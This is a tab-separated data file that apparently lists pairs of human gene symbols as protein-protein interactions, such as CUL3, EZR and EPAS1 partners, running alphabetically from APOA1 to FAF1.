CLEC4G	APOA1
NEFM	APOE
A2M	APP
AAMDC	APP
ABHD10	APP
DCTPP1	APP
DCUN1D2	APP
DDRGK1	APP
DDX1	APP
DDX54	APP
DDX55	APP
DECR1	APP
DENND6B	APP
DTWD1	APP
FAM3A	APP
FAM47B	APP
FAM53A	APP
FANCM	APP
FBXL7	APP
FBXO38	APP
FCGR3A	APP
FDX1L	APP
FEN1	APP
FGF16	APP
FGFBP2	APP
FHL2	APP
FN3KRP	APP
FOXJ2	APP
FOXS1	APP
FSIP1	APP
FUCA1	APP
FYCO1	APP
G3BP1	APP
GABARAPL2	APP
GABPA	APP
GABRA4	APP
HIGD2A	APP
HINT2	APP
MTERFD2	APP
NAPG	APP
RPL36	APP
MTA2	APPL1
CUL2	AR
DCC	AR
DDB2	AR
DDC	AR
HMGB2	AR
TDG	AR
USP12	AR
USP26	AR
WDR77	AR
YWHAQ	AR
ZBTB7A	AR
ZNF318	AR
ARAF	ARAF
BAD	ARAF
CHD6	ARAF
E2F6	ARAF
KLHL12	ARAF
MAP2K2	ARAF
MYO18A	ARAF
PBK	ARAF
PDGFRB	ARAF
PRPF6	ARAF
RAF1	ARAF
RGS12	ARAF
SFN	ARAF
TESK1	ARAF
TIMM44	ARAF
WNK1	ARAF
YWHAH	ARAF
YWHAZ	ARAF
ARIH2	ARAP1
FGFR3	ARAP1
INPP5D	ARAP1
KCTD12	ARAP1
TAB1	ARAP1
TES	ARAP1
TP53BP1	ARAP1
UBC	ARAP1
WAPAL	ARAP1
XRCC6	ARAP1
ASAP1	ARAP3
UBC	ARAP3
DLG4	ARC
COPB1	ARCN1
COPG1	ARCN1
COPZ1	ARCN1
COPZ2	ARCN1
DDB2	ARCN1
ITGA4	ARCN1
KEAP1	ARCN1
TMED10	ARCN1
AP1B1	ARF1
AP1G1	ARF1
AP3B1	ARF1
AP3D1	ARF1
AP3S2	ARF1
AP4E1	ARF1
AP4M1	ARF1
ARF1	ARF1
ARF3	ARF1
ARFGAP1	ARF1
ARFIP1	ARF1
ARFIP2	ARF1
ARHGAP21	ARF1
ASAP1	ARF1
ASAP2	ARF1
ATF2	ARF1
BACH1	ARF1
CDK2	ARF1
CHRM3	ARF1
COPB1	ARF1
COPE	ARF1
COPG1	ARF1
CYTH1	ARF1
CYTH2	ARF1
EEF1G	ARF1
ESR1	ARF1
FBXW8	ARF1
GGA1	ARF1
GGA2	ARF1
GGA3	ARF1
GRK5	ARF1
HERC1	ARF1
TARS	ARF6
VCP	ARF6
VHL	ARF6
RHOH	ARHGDIA
SET	ARHGDIA
SH3GL3	ARHGDIA
SIRT7	ARHGDIA
ST3GAL4	ARHGDIA
SUMO1	ARHGDIA
SUMO4	ARHGDIA
TERF1	ARHGDIA
TNFRSF10B	ARHGDIA
TNFRSF1A	ARHGDIA
UBC	ARHGDIA
UBE2L6	ARHGDIA
ANKRD1	ARHGDIB
CASP3	ARHGDIB
CASP7	ARHGDIB
CDC42	ARHGDIB
EZR	ARHGDIB
KLHL12	ARHGDIB
NAGA	ARHGDIB
RAB4A	ARHGDIB
RAB6A	ARHGDIB
RABGEF1	ARHGDIB
RAC1	ARHGDIB
RAC2	ARHGDIB
RHOA	ARHGDIB
RHOH	ARHGDIB
UBC	ARHGDIB
VAV1	ARHGDIB
RHOH	ARHGDIG
ARHGEF1	ARHGEF1
ATR	ARHGEF1
CAP2	ARHGEF1
CSNK1E	ARHGEF1
CYFIP1	ARHGEF1
DCUN1D1	ARHGEF1
GBF1	ARHGEF1
GNA12	ARHGEF1
HRAS	ARHGEF1
MEPCE	ARHGEF1
PIK3CA	ARHGEF1
RAP1A	ARHGEF1
RHOA	ARHGEF1
RHOB	ARHGEF1
SMAD2	ARHGEF1
SCN2A	ARHGEF10L
ARHGEF11	ARHGEF11
PLXNB2	ARHGEF11
SMAD4	ARHGEF11
ABCA1	ARHGEF12
ARHGEF12	ARHGEF12
ARRB2	ARHGEF12
CD44	ARHGEF12
CYLD	ARHGEF12
GNA12	ARHGEF12
GNA13	ARHGEF12
IGF1R	ARHGEF12
LPAR2	ARHGEF12
RHOA	ARHGEF12
TEC	ARHGEF12
UBC	ARHGEF12
EPHA4	ARHGEF15
ESR1	ARHGEF15
ARHGEF17	ARHGEF17
SFN	ARHGEF17
UBC	ARHGEF17
TAF10	ARHGEF18
RAC1	ARHGEF19
AKT1	ARHGEF2
MAPK1	ARHGEF2
MYC	ARHGEF2
NBR1	ARHGEF2
NFKBIE	ARHGEF2
PAK1	ARHGEF2
PAK4	ARHGEF2
PEX14	ARHGEF2
PLCG1	ARHGEF2
PSMD4	ARHGEF2
RAD23B	ARHGEF2
RHOA	ARHGEF2
SQSTM1	ARHGEF2
SUMO1	ARHGEF2
TAF10	ARHGEF2
UBQLN1	ARHGEF2
VCP	ARHGEF2
WASF1	ARHGEF2
YWHAH	ARHGEF2
YWHAQ	ARHGEF2
YWHAZ	ARHGEF2
CDC42	ARHGEF25
RAC1	ARHGEF25
RHOA	ARHGEF25
SMAD1	ARHGEF25
GNA12	ARHGEF28
GNA13	ARHGEF28
MAPK8IP1	ARHGEF28
SQSTM1	ARHGEF28
TARDBP	ARHGEF28
SUMO2	ARHGEF3
SUMO4	ARHGEF3
UBC	ARHGEF3
DVL2	ARHGEF39
RBPMS	ARHGEF39
UBC	ARHGEF39
APC	ARHGEF4
HLA-B	ARHGEF4
CHPF	ARHGEF5
CRKL	ARHGEF5
UBC	ARHGEF5
KPNA2	ARL4A
EIF2B1	ARL4D
CUL3	ARMC8
EGFR	ARMC8
PFDN5	ARPC2
PRKACA	ARPC2
VCP	ARPC2
PDIA6	ARPC4
HSPA8	ARRB1
IGF1R	ARRB1
RPA1	ASCC2
ACTC1	ASH2L
PAXIP1	ASH2L
PAK1	ATG5
PSMA3	ATG5
PSMA7	ATG5
EEF1D	ATG7
PAFAH1B1	ATIC
PAPSS1	ATIC
PSTPIP1	ATIC
RADIL	ATIC
TMED2	ATL1
HDAC1	ATM
TTI1	ATM
VHL	ATM
WRN	ATM
TERF2	ATN1
HMGB1	ATOH1
UBC	ATP11A
TMEM30A	ATP11B
GLP1R	ATP13A1
CCKBR	ATP13A2
CMTM6	ATP13A2
F2R	ATP13A2
FAM111B	ATP13A2
FAM192A	ATP13A2
FAM8A1	ATP13A2
FKBP8	ATP13A2
FUNDC2	ATP13A2
GAK	ATP13A2
SUMO1	ATP5B
SUMO4	ATP5B
TERT	ATP5B
TK1	ATP5B
TOMM22	ATP5B
TRIM63	ATP5B
UBL4A	ATP5B
UQCRC1	ATP5B
UQCRC2	ATP5B
ADRB2	ATP5C1
AGO4	ATP5C1
ATF2	ATP5C1
ATP5A1	ATP5C1
ATP6V1A	ATP5C1
ATP6V1B1	ATP5C1
CCT7	ATP5C1
CHMP2B	ATP5C1
DPP3	ATP5C1
EEF2K	ATP5C1
EGFR	ATP5C1
ELOF1	ATP5C1
ICT1	ATP5C1
ILK	ATP5C1
MED15	ATP5C1
MPP1	ATP5C1
MYC	ATP5C1
NDUFA12	ATP5C1
NDUFB3	ATP5C1
PAWR	ATP5C1
PJA1	ATP5C1
SSBP1	ATP5C1
SGK1	ATP5D
CLIC1	ATP5F1
ARL8B	ATP6V1B1
ATP6V0A1	ATP6V1B1
ATP6V0D1	ATP6V1B1
ZFR	ATP6V1E1
USP47	ATP6V1H
TRIP6	ATXN1
KAT2B	ATXN3
TRIM63	ATXN3
UBE2G1	ATXN3
USP13	ATXN3
USP21	ATXN3
XRCC6	ATXN3
TADA2A	ATXN7
TAF10	ATXN7
BUB1B	AURKB
CDC20	AURKB
HIST2H3A	AURKB
INCENP	AURKB
PCGF3	AUTS2
MAP3K1	AXIN1
MRPL53	BABAM1
TNFRSF25	BAG4
TK1	BAG6
UBE2E3	BARD1
BHMT	BBS1
FEM1C	BCL2L11
CLASP2	BICD2
PHLDB2	BICD2
HTRA2	BIRC6
SIRT7	BIRC6
FSTL1	BMPR1A
EGR2	BPGM
MORF4L1	BRCA1
MRPL36	BRCA1
MTA2	BRCA1
MYL12A	BRCA1
ND1	BRCA1
PABPC1	BRCA1
PIAS1	BRCA1
PSMA6	BRCA1
BARD1	BRCA2
BRCA1	BRCA2
ATP5O	BRCC3
BARD1	BRCC3
CAND1	BRCC3
KIAA1377	BRD1
HIST2H3A	BRD4
JMJD6	BRD4
KAT8	BRD4
ING2	BRMS1L
BTRC	BST2
KIAA0947	BTRC
KRT79	BTRC
SKP1	BTRC
SNRNP70	BTRC
TBK1	BTRC
EGFR	BUB3
ESRRA	C2CD5
STRADA	CAB39
YWHAQ	CABIN1
CSNK2B	CACNA1A
EFEMP1	CACNA1A
NOS2	CAD
PFDN5	CALCOCO2
TRAF2	CALCOCO2
PHAX	CALD1
CALHM1	CALHM1
ACTBL2	CALM1
CLTB	CALM1
CSNK2A1	CALM1
LIN7C	CALM1
PLXNA1	CALM1
POLR2B	CALM1
PPEF1	CALM1
XRCC4	CALM1
PRKCDBP	CALU
SARS2	CALU
SH3GLB2	CALU
STK4	CALU
HBA1	CAMK1
TUBB6	CAMK1D
LRRC7	CAMK2A
CAMK1D	CAMKK1
SGK1	CAMKK1
ARF6	CAPN1
CBL	CAPN1
COL1A1	CAPN1
COL3A1	CAPN1
ITGA4	CAPN1
SLC9A3R1	CAPN1
BID	CAPN2
NSFL1C	CAPN2
PAFAH1B1	CAPN2
PAPSS1	CAPN2
UBC	CAPN7
VHL	CAPN7
ADRB2	CAPNS1
ALDH7A1	CAPNS1
MST4	CAPNS1
MYO1E	CAPNS1
APBA1	CASK
THAP11	CASP3
TNS4	CASP3
CTNNBIP1	CASP4
FADD	CASP8AP2
NOS1	CAV3
PDGFRB	CAV3
BIRC2	CBLC
EIF6	CBR1
VDAC1	CBR1
DBNL	CBS
FXR2	CBS
GPN1	CBS
HID1	CBS
PHC1	CBX4
DSN1	CBX5
TCEB1	CBX5
TCEB3B	CBX5
TIMM50	CBX5
CBX8	CBX8
CHAMP1	CBX8
EEF1G	CBX8
LRP1	CC2D1A
NCOA2	CC2D1A
ESR1	CCDC110
MAGEA11	CCDC14
C1QBP	CCDC15
EIF4B	CCDC15
HMGB1	CCDC15
SH3GLB2	CCDC158
GDF9	CCDC53
IKBKE	CCDC58
RUVBL2	CCDC87
CCL5	CCL5
TGFBR2	CCNB1
UBE2K	CCNB1
MCM2	CCNC
MED28	CCNC
FBXO31	CCND1
HDAC2	CCND1
HDAC3	CCND1
HSPA8	CCND1
IFI27	CCND1
LPL	CCND1
MCM10	CCND1
MCM2	CCND1
MYBL2	CCND1
NCOA1	CCND1
PCNA	CCND1
PIN1	CCND1
PPP1CB	CCND1
WDR77	CCND1
HIST1H1A	CCND2
AKAP8	CCND3
CASP2	CCND3
CDK11B	CCND3
CDK14	CCND3
CDKN1A	CCND3
CDKN1B	CCND3
DTNBP1	CCND3
FBXO7	CCND3
GC	CCND3
MAF1	CCND3
MAPK4	CCND3
MAPK6	CCND3
MCM10	CCND3
MYB	CCND3
NCOA2	CCND3
PCNA	CCND3
POLD1	CCND3
PPP1CA	CCND3
PPP1CB	CCND3
PPP1CC	CCND3
RARA	CCND3
RBL2	CCND3
RBX1	CCND3
SIL1	CCND3
TSC2	CCND3
UBC	CCND3
VDR	CCND3
CCND1	CCNDBP1
NUSAP1	CCNF
PSMC6	CCT2
TP53RK	CCT3
MAPK13	CCT4
PCK1	CCT4
PEX14	CCT4
ACTA1	CCT5
ACTA2	CCT5
SRSF2	CCT5
STRN	CCT5
SUMO2	CCT5
FYN	CD2AP
SH3BP1	CD2AP
CDT1	CDC23
TERF1	CDC37
TNFRSF14	CDC37
RNF31	CDC40
RAP1GDS1	CDC42
RHOJ	CDC42
RIF1	CDC42
MCM4	CDC7
WARS	CDH5
CDH10	CDH6
GNB4	CDK1
HDGF	CDK1
DLG4	CDK11A
HSPA4	CDK11B
KAT7	CDK11B
MEPCE	CDK11B
CCDC85B	CDK18
ANXA2	CDK2
ANXA5	CDK2
CDK6	CDK2
DSG1	CDK2
EWSR1	CDK2
FLNC	CDK2
FSCN1	CDK2
H1FX	CDK2
HSPE1	CDK2
HYOU1	CDK2
IARS	CDK2
ILF2	CDK2
ILF3	CDK2
KAT2A	CDK2
KAT2B	CDK2
KHSRP	CDK2
KIF26B	CDK2
KPNA2	CDK2
KPNB1	CDK2
KPRP	CDK2
LARS	CDK2
LATS2	CDK2
LDHA	CDK2
LDHB	CDK2
LGALS3BP	CDK2
LGALS7	CDK2
LMNA	CDK2
LMNB1	CDK2
MARCKSL1	CDK2
MCCC1	CDK2
MCCC2	CDK2
MCM2	CDK2
MCM4	CDK2
SND1	CDK2
DBNL	CDK4
DUSP9	CDK4
EWSR1	CDK4
RPL38	CDK4
CTNNB1	CDK5R1
NRIP1	CDK8
ISL1	CDKN2B
CCNB1	CDT1
CEACAM1	CEACAM1
SRC	CEACAM3
CEACAM5	CEACAM5
AR	CEBPA
ASXL1	CEBPA
ATF2	CEBPA
ATF4	CEBPA
ATF7	CEBPA
BATF	CEBPA
BATF3	CEBPA
C1QBP	CEBPA
CAPN2	CEBPA
E2F4	CEBPA
EWSR1	CEBPA
FOS	CEBPA
FOSL1	CEBPA
FUT1	CEBPA
GRIN3A	CEBPA
ONECUT1	CEBPA
RANBP2	CEBPA
DDX5	CENPA
PRKAA2	CEP170B
MAPK1	CEP55
BMPR2	CES3
YWHAQ	CFL1
DNAJB1	CFTR
FKBP8	CFTR
FLOT2	CFTR
USP19	CFTR
OXSR1	CHCHD4
RHOT2	CHCHD4
RPL10L	CHCHD4
CBX1	CHD1L
CBX3	CHD1L
H2AFX	CHD1L
H2AFZ	CHD1L
ATPIF1	CHD3
CHD3	CHD3
IVNS1ABP	CHD3
KPNB1	CHD3
MTA2	CHD3
PRG2	CHD3
RIF1	CHD3
SDCCAG3	CHD3
TAF6	CHD3
CSNK2A1	CHD4
IKZF2	CHD4
MTA2	CHD4
MYC	CHD4
USP36	CHD4
MYC	CHD5
SIRT7	CHD7
USP7	CHFR
FGFR3	CHGB
SMAD2	CHGB
CHI3L1	CHI3L1
FOS	CHMP3
GRB2	CHRD
YWHAZ	CHTOP
NFKBIL1	CLEC18C
PSMC2	CLIP1
PDIA6	CLN8
TSEN34	CLP1
TSEN54	CLP1
UBC	CLP1
CDC45	CLSPN
CLINT1	CLTC
CLTA	CLTC
ITSN1	CLTC
LRRK2	CLTC
MAPK13	CLTC
MYB	CLTC
NR3C1	CLTC
HSPA1L	CLU
CBWD1	CNIH4
RAF1	CNKSR1
ENO2	COASY
DDR1	COL3A1
SMN1	COPS6
ACTG1	COTL1
PRKAB1	COTL1
COX4I1	COX1
MRPL15	COX15
NDUFA9	COX15
NDUFS4	COX15
NDUFS6	COX15
CCNG1	COX2
HTT	COX3
HNRNPA0	COX5A
HTT	COX6C
PMCH	CPE
POLA2	CPE
GINS3	CPLX1
CPN1	CPN2
CDK1	CPS1
CPT1A	CPS1
SEC22B	CPS1
AICDA	CPSF3
RPS19	CPSF7
TNFRSF1A	CRADD
HDAC1	CREB1
NR5A2	CREB1
TTLL5	CREB3
ACVR1	CREBBP
CHUK	CREBBP
CITED1	CREBBP
CITED2	CREBBP
FOXO3	CREBBP
HLF	CREBBP
LIG4	CREBBP
LYN	CREBBP
MAFG	CREBBP
MDC1	CREBBP
MED21	CREBBP
MGMT	CREBBP
MSH6	CREBBP
PHOX2A	CREBBP
RAC3	CREBBP
STAT6	CREBBP
SUV39H1	CREBBP
TP73	CREBBP
IGF2R	CREG1
RB1	CREG1
RBL1	CREG1
ARHGAP32	CRK
ARHGEF11	CRK
IGF1R	CRK
KRT15	CRK
LYZ	CRK
MAP4K1	CRK
PCDHA11	CRK
TUBB	CRK
RAF1	CRKL
FUBP1	CRMP1
KLHL20	CRMP1
MAPK8IP2	CRMP1
SPRY2	CRMP1
HIST1H1A	CRP
LEP	CRP
MAPK3	CRP
NONO	CRTC2
PPP3CA	CRTC2
PRKAA1	CRTC2
UBC	CRTC2
YWHAQ	CRTC2
NR2E3	CRX
NRL	CRX
ATXN1	CRY2
MIP	CRYGC
HCK	CSK
KLHL1	CSK
CSNK2A2	CSN3
MAPRE1	CSN3
RPL8	CSNK1A1
CCT8	CSNK1E
ATF1	CSNK2A1
EIF3B	CSNK2A2
PCGF3	CSNK2A2
PPP1CB	CSNK2B
PPP1CC	CSNK2B
UBQLN4	CSTF2T
HIF1A	CTNNB1
PTPRG	CTNNB1
PTPRM	CTNNB1
PTPRO	CTNNB1
PTPRU	CTNNB1
SMAD7	CTNNB1
SERPINB13	CTSB
CTSD	CTSD
FN1	CTSD
HIP1R	CTTN
ITSN1	CTTN
NCF1	CTTN
NONO	CTTN
OXCT1	CTTN
PAK1	CTTN
PAK2	CTTN
RAD21	CTTN
RDX	CTTN
SARS	CTTN
SART3	CTTN
SDC3	CTTN
SDHAF2	CTTN
SH3PXD2A	CTTN
SHANK2	CTTN
SSB	CTTN
STAT1	CTTN
SUCLG2	CTTN
THY1	CTTN
TINF2	CTTN
TNK2	CTTN
UBC	CTTN
LGALS3	CUBN
QARS	CUL1
RAE1	CUL1
RANBP2	CUL1
RBL2	CUL1
POP7	CUL2
CASP8	CUL3
CCDC110	CUL3
CKMT1A	CUL3
EEF1G	CUL3
GMPS	CUL3
HAT1	CUL3
HNRNPUL1	CUL3
IRAK1	CUL3
IRS4	CUL3
ITCH	CUL3
KBTBD4	CUL3
MRPL28	CUL3
MRPL37	CUL3
MRPL4	CUL3
MRPL44	CUL3
MRPL50	CUL3
MRPS11	CUL3
NXF1	CUL3
PKM	CUL3
PPP1CA	CUL3
PPP1CB	CUL3
PUF60	CUL3
RPL23A	CUL3
RPL24	CUL3
RPS27A	CUL3
RPS4X	CUL3
RPS5	CUL3
SDF2L1	CUL3
SEC24A	CUL3
SEC24B	CUL3
SEC31A	CUL3
SEPHS1	CUL3
SERBP1	CUL3
SF3A1	CUL3
TIMM50	CUL3
BAG4	CUL4A
BANF1	CUL4A
CA2	CUL4A
CAND1	CUL4A
CAST	CUL4A
CCNE1	CUL4A
CCT5	CUL4A
COPS7A	CUL4A
DDB1	CUL4A
DDB2	CUL4A
DICER1	CUL4A
FAM105B	CUL4A
GSTK1	CUL4A
H2AFV	CUL4A
HIST1H2AG	CUL4A
HSPA8	CUL4A
KAT2A	CUL4A
KEAP1	CUL4A
KLHL9	CUL4A
PHLDA3	CUL4A
POC1B	CUL4A
PPP2R1A	CUL4A
SCAF11	CUL4A
SH3RF2	CUL4A
SKP1	CUL4A
SKP2	CUL4A
SLC25A22	CUL4A
SLC25A5	CUL4A
SLC25A6	CUL4A
TRPC4AP	CUL4A
TUBB	CUL4A
NCL	CUL4B
PCBD1	CUL4B
TCEAL2	CUL4B
TLE1	CUL4B
TOR1AIP2	CUL4B
C1QBP	CUL5
CTPS1	CUL5
FBXW10	CUL5
FCHO1	CUL5
HNRNPA1	CUL5
HP1BP3	CUL5
PRPF39	CUL5
PTPN5	CUL5
SAE1	CUL5
SAMHD1	CUL5
SMARCA5	CUL5
SNRNP200	CUL5
SOCS1	CUL5
SRSF3	CUL5
SSBP1	CUL5
DAZAP2	CXCL12
ELANE	CXCL12
MEN1	CXXC1
NR5A1	CXXC1
WDR5	CXXC1
WDR82	CXXC1
AGTPBP1	CYCS
UQCRC1	CYCS
VDAC1	CYCS
RIPK1	CYLD
SPATA2	CYLD
TRAF7	CYLD
TRPA1	CYLD
FDX1	CYP11A1
ECSIT	CYP2C18
A2M	CYP2C8
BLMH	CYP2C8
DNAJB1	CYP2C8
ECSIT	CYP2C8
EXOC6	CYP2C8
MAST1	CYP2C8
PGRMC1	CYP2C8
RNF32	CYP2C8
RNF32	CYP2C9
STAMBP	CYP2C9
GATM	CYP2E1
ADAMTSL4	CYP2S1
UBC	CYP2S1
FYN	CYP4F2
GRB2	CYP4F2
ITGAV	CYR61
ITGB5	CYR61
MIS12	CYR61
MYC	CYR61
SOX2	CYR61
UBC	CYR61
UBD	CYR61
YWHAZ	CYR61
ZWINT	CYR61
GLP1R	CYSTM1
CYTIP	CYTH1
APC	CYTH2
ARRB2	CYTH2
CCDC120	CYTH2
INSR	CYTH2
IRS1	CYTH2
MAPK6	CYTH2
MYD88	CYTH2
PNPLA2	CYTH2
FNBP1L	DAAM1
PRPF40A	DAAM1
RHOA	DAAM1
RHOB	DAAM1
CDK5	DAB1
NUP155	DAB2
PRDX1	DAB2
TGFBR2	DAB2
AKT1	DAB2IP
HDAC1	DACT1
GSK3A	DACT2
DACT2	DACT3
UTRN	DAG1
WWP1	DAG1
ESR1	DAGLB
C1QBP	DAP3
CNBP	DAP3
MAGOH	DBN1
MARCKS	DBN1
UPF3A	DCP2
ZC3HAV1	DCP2
DCPS	DCPS
NUDCD3	DCUN1D1
QPCT	DCUN1D1
SNRNP70	DCUN1D1
AHR	DDB1
COPS5	DDB1
PSMB1	DDB2
BAG3	DDI2
ZMPSTE24	DDOST
HNRNPA1	DDX1
HNRNPA2B1	DDX1
NUP133	DDX3X
ZNF512B	DDX3X
SPSB4	DDX4
SRC	DDX4
RPL31	DDX56
HDAC2	DEK
HDGF	DEK
BZW2	DFFA
CASP7	DFFA
NAP1L5	DFFA
PFAS	DFFA
PRKAA2	DFFA
STRN4	DFFA
ACP6	DHCR7
FBL	DHX15
RBMX	DHX15
SF3A2	DHX15
SRSF1	DHX15
SRSF3	DHX15
SUMO1	DHX15
SUMO2	DHX15
UBC	DHX15
MIF4GD	DHX16
TBC1D17	DHX29
H2AFX	DHX30
HEBP1	DHX36
PTGES3	DHX36
CUL1	DHX9
PCBD1	DIP2C
DIRAS2	DIRAS2
TRIO	DISC1
TUBB	DISC1
TUBB2A	DISC1
TUBG1	DISC1
UTRN	DISC1
XPNPEP1	DISC1
ZFYVE20	DISC1
AXIN1	DIXDC1
CDC5L	DIXDC1
DVL2	DIXDC1
NDEL1	DIXDC1
ARRB1	DKC1
ARRB2	DKC1
CAND1	DKC1
EEF1G	DKC1
EIF3F	DKC1
ESR1	DKC1
FBL	DKC1
HMBOX1	DKC1
LSM2	DKC1
LYAR	DKC1
KCNA4	DLG3
KHDRBS1	DLG3
SSTR2	DLG3
SYNGAP1	DLG3
ARAP2	DLG4
ASAP1	DLG4
FYN	DLG4
FZD4	DLG4
GAB1	DLG4
SGK223	DLG4
SUV420H2	DLG4
SYNPO2L	DLG4
SYTL3	DLG4
TIE1	DLG4
TMEM54	DLG4
TYRO3	DLG4
GRIN2B	DLGAP2
GRIN2D	DLGAP2
AHNAK	DMD
UBC	DMXL1
CRMP1	DNAJB11
HSPA4	DNAJB11
RRM1	DNAJB11
AP1G1	DNER
UBC	DNM1
MANEA	DNM2
CTBP1	DNMT1
NBR1	DNMT1
PSMD4	DNMT1
BAZ2A	DNMT3B
DOK1	DOK1
GRB10	DOK1
HCK	DOK1
ITGB1	DOK1
WDR4	DPP8
DPP9	DPP9
NCOA6	DPY30
FTSJ1	DRG1
SMAD1	DROSHA
PAK1	DSCAM
IVL	DSP
CALM1	DST
CDC5L	DST
ZNF16	DYNC1H1
TUBA4A	E2F1
MAPK1	ECT2
HADHA	EDC4
ILF2	EDC4
TOM1	EEA1
GADD45G	EEF1A1
CD81	EEF1D
GH1	EEF1D
HEXDC	EEF1D
FTO	EEF2
EPHA1	EFNA1
ITGA4	EFTUD2
RPUSD2	EFTUD2
DCN	EGFR
YWHAZ	EGFR
EGLN1	EGLN1
HIF1A	EGLN1
MAGEA9	EGLN1
ZNF217	EHMT2
RPL23	EIF2AK2
RPL36AL	EIF2AK2
RPL37	EIF2AK2
RPL37A	EIF2AK2
EIF2B1	EIF2S1
LRPAP1	EIF4EBP1
LRRK2	EIF4EBP1
EIF4H	EIF4G2
ITGA4	EIF4G2
MAGEA6	EIF4G2
MKNK1	EIF4G2
OPTN	EIF4G2
POLDIP3	EIF4G2
RAB7A	EIF4G2
RPA2	EIF4G2
SKIL	EIF4G2
SLIRP	EIF4G2
UBC	EIF4G2
EIF3F	EIF4G3
EIF3H	EIF4G3
KIAA1377	EIF6
MRPS31	EIF6
CASP4	ELF4
KDM5B	ELF4
RUNX1	ELF4
AFF4	ELL2
ESR1	ELMSAN1
HDAC1	ELMSAN1
IKBKAP	ELP2
AKAP8L	EMD
AURKB	EMD
ARIH2	ENSA
CNKSR2	ENSA
RANBP9	ENTPD1
PRKCA	ENTPD5
ACTA1	EP300
GTF3C3	EPAS1
HIF1A	EPAS1
HSPA4	EPAS1
IKBKAP	EPAS1
KLHL20	EPAS1
MAX	EPAS1
MCM3	EPAS1
MED18	EPAS1
MED20	EPAS1
MED22	EPAS1
MED23	EPAS1
MED25	EPAS1
MED26	EPAS1
MED29	EPAS1
MED4	EPAS1
MED7	EPAS1
MED8	EPAS1
PIAS2	EPAS1
PKM	EPAS1
PRKD1	EPAS1
PSMD1	EPAS1
RBM4	EPAS1
RUVBL1	EPAS1
SIN3A	EPAS1
SMAD3	EPAS1
SSBP3	EPAS1
STAT5A	EPAS1
STUB1	EPAS1
UBC	EPAS1
VHL	EPAS1
WRNIP1	EPAS1
YTHDF2	EPAS1
ACTA1	EPB41
ACTB	EPB41
ATP5O	EPB41
CALR	EPB41
CBR1	EPB41
CDKN2A	EPB41
CLIC1	EPB41
COPZ1	EPB41
COX5B	EPB41
CRYAB	EPB41
CSTB	EPB41
DAD1	EPB41
SIRT7	EPB41L2
SDC2	EPHB2
CLINT1	EPS15
KRT5	EPS15
KRT6A	EPS15
KRT73	EPS15
PRKCDBP	EPS15L1
BTC	ERBB4
CRK	ERBB4
STAT5A	ERBB4
RAD23A	ERC1
RIMS1	ERC1
STK4	ERC1
WDR4	ERC1
XIAP	ERC1
YWHAG	ERC1
PPFIA2	ERC2
ERCC3	ERCC5
ILK	ERH
MRPL18	ERH
HNRNPUL2	ERLIN2
COPG1	ESR1
COPS5	ESR1
COX2	ESR1
DNAJB11	ESR1
DNTTIP2	ESR1
EP300	ESR1
EPPK1	ESR1
HIF1A	ESR1
HIST1H2AD	ESR1
HSPA1L	ESR1
HSPA4	ESR1
KIAA0368	ESR1
RUVBL2	ESR1
S100A7	ESR1
TRIM25	ESR1
TRIM28	ESR1
NCOA1	ESR2
NCOA2	ESR2
PSMC3IP	ESR2
PTCD3	ESR2
IKBKE	ETF1
KEAP1	ETF1
ETS1	ETS2
POU5F1	ETS2
TWIST1	ETS2
TWIST2	ETS2
UBC	ETS2
BANF1	EVC2
SMAD9	EVC2
CCDC93	EXOC1
SH3BP5	EXOC1
RALA	EXOC3
DLG4	EXOC4
DTNBP1	EXOC4
UBD	EXOC4
ACTR3B	EXOC5
EXOC2	EXOC5
EXOC3	EXOC5
PRKCG	EXOC5
EXOC2	EXOC6
PRDX2	EXOC6
ARPC1A	EXOC7
BBS4	EXOC7
BBS7	EXOC7
CCDC85B	EXOC7
KIF5B	EXOC7
KXD1	EXOC7
PRPF19	EXOC7
RHOQ	EXOC7
RTN4IP1	EXOC7
ZC3H14	EXOC7
ATG14	EXOC8
BECN1	EXOC8
BRCC3	EXOC8
CCDC85B	EXOC8
EFHC2	EXOC8
EXOC2	EXOC8
EXOC3	EXOC8
EXOC5	EXOC8
KRT18	EXOC8
PCM1	EXOC8
TADA2A	EXOC8
TLN2	EXOC8
EXOSC4	EXOSC1
EXOSC9	EXOSC1
MTMR3	EXOSC1
EXOSC10	EXOSC3
EXOSC2	EXOSC3
EXOSC3	EXOSC3
EXOSC4	EXOSC3
CDK9	EXOSC5
UBC	EXOSC5
ZC3HAV1	EXOSC5
AICDA	EXOSC6
DIS3L	EXOSC6
DNAJC30	EXOSC6
EIF3I	EXOSC6
EXOSC9	EXOSC6
GSE1	EXOSC6
SRSF3	EXOSC6
UBC	EXOSC6
EXOSC3	EXOSC8
EXOSC6	EXOSC8
EXOSC7	EXOSC8
EXOSC8	EXOSC8
SKIV2L2	EXOSC8
UBC	EXOSC8
VHL	EXOSC8
DIS3L	EXOSC9
EXOSC4	EXOSC9
APC	EXPH5
EXT1	EXT1
TRAP1	EXT1
CDKN1A	EXT2
TK1	EXT2
GNAI2	EYA1
CCDC85B	EZH2
CDK6	EZH2
HIST3H3	EZH2
HLX	EZH2
PFDN1	EZH2
PSMB6	EZH2
SMN1	EZH2
SMS	EZH2
SNAI1	EZH2
ICAM1	EZR
ICAM2	EZR
ICAM3	EZR
IKBKE	EZR
ISG15	EZR
L1CAM	EZR
LCK	EZR
MC1R	EZR
MPP3	EZR
MSN	EZR
NF2	EZR
OGFOD1	EZR
PALLD	EZR
PDCD10	EZR
PDCD6IP	EZR
PHLPP2	EZR
PIK3R1	EZR
PLCB3	EZR
PPL	EZR
PRX	EZR
PTK2	EZR
PTPRC	EZR
RDX	EZR
RHOA	EZR
RIC8A	EZR
ROCK1	EZR
SGK1	EZR
SLC12A2	EZR
SLC9A3R1	EZR
SLC9A3R2	EZR
SRC	EZR
SUMO2	EZR
TBC1D10A	EZR
TNFRSF10B	EZR
TNFRSF1A	EZR
TRAF6	EZR
TRNT1	EZR
TSC1	EZR
UBA1	EZR
UBC	EZR
UBE2R2	EZR
USP1	EZR
VCAM1	EZR
PROS1	F10
F11	F11
GP1BA	F11
CD93	F12
EPAS1	F12
GP1BA	F12
HIF1A	F12
KLKB1	F12
KRT1	F12
MMP12	F12
MMP13	F12
MMP14	F12
UBC	F12
UBE2D1	F12
UBE2D2	F12
UBE2D3	F12
UBE2E1	F12
UBE2N	F12
NUDT21	F13A1
F13A1	F13B
FGG	F13B
F2	F2
F2R	F2
ITGA2B	F2
SERPINA5	F2
SERPINB6	F2
SERPING1	F2
THBD	F2
CHMP4A	F2R
CTSG	F2R
ELANE	F2R
FLOT2	F2R
GNAI2	F2R
PROCR	F2R
PRTN3	F2R
SNX1	F2R
TMED2	F2R
CALR	F8
FADD	FAF1
